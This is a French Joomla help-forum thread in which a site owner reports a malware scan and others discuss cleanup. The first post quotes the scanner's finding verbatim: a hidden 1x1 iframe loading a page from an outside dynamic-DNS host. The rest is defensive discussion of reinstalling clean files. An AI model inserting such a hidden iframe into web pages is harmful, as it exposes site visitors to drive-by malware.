Injection d'un iframe; malware java.

Réduire
X
 
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages

  • [RÉGLÉ] Injection d'un iframe; malware java.

    Je reviens vers vous,

    une enquête un peu plus approfondie me donne des infos suivantes :

    il y a un malware après scan du site

    Un java s'affiche sur ma page d'accueil sur Firefox et IE10

    Le sacn du site dit qu'il y a ceci :

    Hidden Iframes.
    Details: http://labs.sucuri.net/db/malware/mw...piciousport?v2
    <iframe src="http://cfhmafsk.sytes.net:12601/chaines/password/author/licensing.php?browse=82" width=1 height=1 style="visibility: hidden">
    Known javascript malware.
    Details: http://sucuri.net/malware/malware-entry-mwjsanon7
    <iframe src="http://cfhmafsk.sytes.net:12601/chaines/password/author/licensing.php?browse=82" width=1 height=1 style="visibility: hidden"></iframe><!DOCTYPE html>
    Et ce site n'est pas encore connu et est en ligne juste pour voir un peu de quoi il retourne.

    Merci à vous.

    Plano
    Dernière édition par Plano à 10/10/2013, 11h58
    " Aimer c'est Agir " - V.HUGO

    Si tu es intéressé par notre 1er Joomapéro de 2014 pour la Belgique francophone c'est ICI

  • #2
    Re : Injection d'un iframe; malware java.

    [Modo]@Olivier : j'ai déplacé ton dernier message pour créer une nouvelle discussion pour maximiser tes chances d'obtenir une réponse.[/Modo]
    Christophe (cavo789)
    Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be
    Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)​

    Commentaire


    • #3
      Re : Injection d'un iframe; malware java.

      Bonjour,

      Toute injection de ce type indique une infection du site.
      Quelle version EXACTE de Joomla! est installée, et avec quelles extensions et versions, y compris template, sont installées.

      Il est manifeste que soit une extension (ou version de Joomla! avec une faille) est utilisée, soit que l'infection est venue par FTP.

      Donc déterminer ce qui est infecté donnera une idée du type d'injection de code, et éventuellement des pistes pour remettre le tout en état.
      Pas de demande de support par MP.
      S'il n'y a pas de solution, c'est qu'il n'y a pas de problème (Devise Shadok)

      Commentaire


      • #4
        Re : Injection d'un iframe; malware java.

        Bonjour,

        voilà, je reviens avec quelques infos.

        D'abord, le souci est réglé, enfin pour l'instant.

        Je n'ai aucun mérite à vous livrer ce post. Notre edwin national a décortiqué le souci.

        il s'agit en fait d'une ligne de code cryptée qui s'est logée dans le factory.php (son but : une fois exécuté, il envoie des mails avec un lien vers un site). Voilà en très très gros.

        Le problème a été solutionné en envoyant l'ensemble des dossiers et fichiers d'un Joomla 3.1.5 propres sur la racine et le tour était joué. Ca semble tellement évident ;-)

        Voilà, merci à ceux qui m'ont apporté de l'aide et à edwin.

        Plano
        " Aimer c'est Agir " - V.HUGO

        Si tu es intéressé par notre 1er Joomapéro de 2014 pour la Belgique francophone c'est ICI

        Commentaire


        • #5
          Re : Injection d'un iframe; malware java.

          Ce qui a été fait a été de colmater la brèche.

          Reste à trouver l'origine et le comment de cette injection de code, donc à sécuriser le tout.
          Pas de demande de support par MP.
          S'il n'y a pas de solution, c'est qu'il n'y a pas de problème (Devise Shadok)

          Commentaire

          Annonce

          Réduire
          Aucune annonce pour le moment.

          Partenaire de l'association

          Réduire

          Hébergeur Web PlanetHoster
          Travaille ...
          X